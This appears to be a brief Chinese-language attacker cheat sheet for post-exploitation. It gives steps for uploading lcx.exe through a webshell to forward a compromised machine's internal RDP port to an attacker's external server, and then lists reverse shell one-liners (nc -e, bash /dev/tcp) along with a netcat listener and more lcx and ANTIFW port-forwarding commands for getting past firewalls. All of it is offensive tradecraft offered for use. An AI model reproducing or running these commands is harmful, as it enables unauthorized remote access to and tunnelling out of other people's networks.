Lcx 内网端口转发


1，在目标机找到可读可写目录，然后上传 lcx.exe 端口转发工具 。

2，在 webshell 中 输入 C:\WINDOWS\lcx.exe  -slave  攻击机IP（外网） 521  目标机IP（内网）  3389（远程连接端口）。
     //  将目标机的 3389 端口转发到 攻击机（外网服务器）某个闲置端口上 。

3，攻击机同理，找到可读可写目录，上传 lcx.exe ，并在 cmd 执行 。

4，C:/Users/shiyan>D:/lcx.exe  -listen 521  2017      //  监听本地 521 端口并转发到空闲的 2017 端口 。

5， Win + R 打开快捷方式，输入 mstsec 进入远程连接登录界面 。

6，输入 127.0.0.1:2017  这个 IP 地址，进行登录。


反弹shell：
shell： nc -e cmd ip port
shell: bash -i >& /dev/tcp/ip/port 0>&1(linux)
服务器： nc -vv -lp port
端口转发：
shell: lcx -slave ip port 127.0.0.1 port
服务器： lcx -listen port 33891
ANTIFW.exe -s #运行程序，将3389转发到80
ANTIFW.exe -l #关闭程序，恢复iis